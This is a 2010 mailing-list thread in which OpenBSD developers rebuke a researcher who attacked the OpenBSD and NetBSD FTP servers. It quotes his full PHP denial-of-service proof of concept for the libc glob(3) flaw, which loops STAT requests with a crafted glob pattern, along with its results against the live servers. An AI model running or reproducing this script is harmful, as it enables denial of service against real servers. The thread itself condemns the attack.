I know how to google for nmap!! Can I be a security expert too??? Pretty please! :)
- paid professional paranoid On 7/2/10, Bob Beck <[email protected]> wrote: > It's rather astonishing what attempts to passfor a credible security > advisory today. > > "oh, I made a lot of connections to the site and they blocked me." > > Thank you, Maksymillian, for showing us all that you can execute a > denial of service attack from 90.156.82.13. > > I wonder how many connections his site supports to his services. perhaps > some > similar "security expert" can test his connection rate and let us all know. > > # traceroute -n 90.156.82.13 > traceroute to 90.156.82.13 (90.156.82.13), 64 hops max, 40 byte packets > 1 129.128.5.2 6.906 ms 0.818 ms 1.444 ms > 2 129.128.3.194 0.306 ms 0.303 ms 0.306 ms > 3 129.128.3.130 0.345 ms 0.502 ms 0.656 ms > 4 129.128.3.170 0.502 ms 0.726 ms 1.443 ms > 5 64.42.209.114 5.628 ms 5.562 ms 5.272 ms > 6 216.18.32.13 6.337 ms 5.676 ms 5.752 ms > 7 66.59.190.198 18.936 ms 19.18 ms 18.523 ms > 8 66.59.190.18 18.384 ms 18.659 ms 18.426 ms > 9 67.69.199.105 17.797 ms 17.785 ms 18.111 ms > 10 64.86.115.13 17.369 ms 17.651 ms 17.175 ms > 11 216.6.98.29 68.828 ms 69.162 ms 69.146 ms > 12 216.6.57.9 87.943 ms 87.828 ms 87.879 ms > 13 195.219.69.29 175.930 ms 176.47 ms 175.804 ms > 14 195.219.69.2 189.366 ms 176.757 ms 179.460 ms > 15 195.219.180.6 193.562 ms 197.755 ms 197.880 ms > 16 195.219.246.2 181.461 ms 201.536 ms 179.635 ms > 17 83.238.251.56 177.432 ms 177.971 ms 177.115 ms > 18 83.238.250.38 189.741 ms 190.70 ms 189.646 ms > 19 83.238.250.12 191.123 ms 193.99 ms 192.135 ms > 20 83.238.251.41 189.843 ms 189.805 ms 189.245 ms > 21 87.204.248.202 188.981 ms 189.167 ms 459.987 ms > 22 87.99.33.90 190.739 ms 190.637 ms 190.955 ms > 23 87.99.32.202 190.180 ms 190.271 ms 190.160 ms > 24 90.156.82.13 289.39 ms 331.276 ms 319.419 ms > ^C > # host 90.156.82.13 > 13.82.156.90.in-addr.arpa domain name pointer 90-156-82-13.magma-net.pl. > # > > > > > On 2 July 2010 15:47, Theo de Raadt <[email protected]> wrote: >> OK, I am letting the maintainer of the site know, at the University Campus >> that you have just executed a denial of service against. >> >> I am surprised that you would go out of your way to declare so freely >> that you have purposely participated in a denial of service. >> >>> Return-Path: [email protected] >>> Delivery-Date: Fri Jul 2 15:38:24 2010 >>> Received: from shear.ucar.edu (lists.openbsd.org [192.43.244.163]) >>> by cvs.openbsd.org (8.14.3/8.12.1) with ESMTP id o62LcNgR016472 >>> (version=TLSv1/SSLv3 cipher=DHE-DSS-AES256-SHA bits=256 >>> verify=FAIL) >>> for <[email protected]>; Fri, 2 Jul 2010 15:38:24 -0600 (MDT) >>> Received: from v117864.home.net.pl (v117864.home.net.pl [89.161.252.8]) >>> by shear.ucar.edu (8.14.3/8.14.3) with SMTP id o62LcG20025931 >>> for <[email protected]>; Fri, 2 Jul 2010 15:38:17 -0600 (MDT) >>> Received: from 90-156-82-13.magma-net.pl [90.156.82.13] (HELO >>> [127.0.0.1]) >>> by securityreason.home.pl [89.161.252.8] with SMTP (IdeaSmtpServer >>> v0.70) >>> id a6e20078b871f388; Fri, 2 Jul 2010 22:38:15 +0200 >>> Message-ID: <[email protected]> >>> Date: Fri, 02 Jul 2010 22:38:24 +0200 >>> From: Maksymilian Arciemowicz <[email protected]> >>> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.10) > Gecko/20100512 Thunderbird/3.0.5 >>> MIME-Version: 1.0 >>> To: [email protected], [email protected] >>> Subject: libc/glob(3) DoS PoC for ftp.openbsd.org and ftp.netbsd.org >>> X-Enigmail-Version: 1.0.1 >>> Content-Type: text/plain; charset=ISO-8859-1 >>> Content-Transfer-Encoding: 7bit >>> >>> -----BEGIN PGP SIGNED MESSAGE----- >>> Hash: SHA1 >>> >>> <?php >>> >>> /* Libc/glob(3) denial-of-service >>> Maksymilian Arciemowicz from SecurityReason.com >>> >>> This script has been used to attack ftp.openbsd.org and ftp.netbsd.org >>> >>> Result (ftp.openbsd.org): >>> - - Connection refused >>> >>> and in the end >>> >>> # telnet ftp.openbsd.org 21 >>> Trying 129.128.5.191... >>> Connected to ftp.openbsd.org. >>> Escape character is '^]'. >>> 421- If you are seeing this message you have been blocked from using >>> 421- this ftp server - most likely for mirroring content without paying >>> 421- attention to what you were mirroring or where you should be >>> mirroring >>> 421- it from, or for excessive connection rates. >>> 421- OpenBSD should *NOT* be mirrored from here, you should use >>> 421- a second level mirror as described in >>> http://www.openbsd.org/ftp.html >>> 421 >>> >>> Connection closed by foreign host. >>> # >>> >>> ;] >>> >>> Result (ftp.netbsd.org): >>> - - no more access for anonymous >>> >>> On 02.07.2010 20:29 CET, ftp.netbsd.org has return: >>> 530 User ftp access denied, connection limit of 160 reached. >>> >>> >>> Affter attack from one host >>> >>> */ >>> >>> $conf['host']= $argv[1] ? $argv[1] : "HOST"; >>> $conf['user'] =$argv[2] ? $argv[2] : "anonymous"; >>> $conf['pass'] =$argv[3] ? $argv[3] : "[email protected]"; >>> $conf['port']= $argv[4] ? $argv[4] : 21; >>> >>> $dirnames=array('A', 'B', 'C', 'D', >>> 'E','F','G','H','I','J','K','M','N','O','P'); >>> > $pathsent="{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{ > ..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*c > x"; >>> >>> // fts_levelsumary >>> $fts_level=2; >>> >>> $created_directories=true; >>> >>> function attackglobinftp(){ >>> global $conf; >>> global $dirnames; >>> global $pathsent; >>> global $fts_level; >>> global $created_directories; >>> >>> if (isset($conf['port']) and >>> ($socket=socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) and >>> (socket_connect($socket, $conf['host'], $conf['port']))){ >>> >>> echo "New connection opened\n"; >>> socket_write($socket, "USER ".$conf['user']."\nPASS > ".$conf['pass']."\n"); >>> >>> if(!$created_directories) >>> for($stagc=0;$stagc < count($dirnames);$stagc++){ >>> for($ssdc=2;$ssdc--;){ >>> socket_write($socket, "MKD > ".$dirnames[$stagc]."\nCWD >>> ".$dirnames[$stagc]."\n"); >>> echo "MKD ".$dirnames[$stagc]."\nCWD > ".$dirnames[$stagc]." for \n"; >>> echo socket_read($socket,10204); >>> echo $ssdc."\n"; >>> } >>> for($ssdc=256;$ssdc--;){ >>> socket_write($socket, "cwd ..\n"); >>> echo socket_read($socket,10000); >>> } >>> } >>> $created_directories=true; >>> >>> >>> for($aoi=1; $aoi--; >>> ){ >>> socket_write($socket, "STAT ".$pathsent."\n"); >>> echo "sent: STAT ".$pathsent."s\n"; >>> } >>> sleep(5); >>> } else >>> echo "Unable to connect\n"; >>> >>> } >>> >>> while(1) >>> attackglobinftp(); >>> ?> >>> >>> >>> - -- >>> Best Regards, >>> - ------------------------ >>> pub 1024D/A6986BD6 2008-08-22 >>> uid Maksymilian Arciemowicz (cxib) >>> <[email protected]> >>> sub 4096g/0889FA9A 2008-08-22 >>> >>> http://securityreason.com >>> http://securityreason.com/key/Arciemowicz.Maksymilian.gpg >>> -----BEGIN PGP SIGNATURE----- >>> >>> iEYEARECAAYFAkwuTkAACgkQpiCeOKaYa9aafQCeNCpKgH3qFz0HscgNJ/JEunyS >>> I0EAnAxEcaMFSq4Kl0x3NSqzeuV1SP3p >>> =lx/r >>> -----END PGP SIGNATURE----- > > -- Sent from my mobile device http://www.glumbert.com/media/shift http://www.youtube.com/watch?v=tGvHNNOLnCk "This officer's men seem to follow him merely out of idle curiosity." -- Sandhurst officer cadet evaluation. "Securing an environment of Windows platforms from abuse - external or internal - is akin to trying to install sprinklers in a fireworks factory where smoking on the job is permitted." -- Gene Spafford learn french: http://www.youtube.com/watch?v=30v_g83VHK4
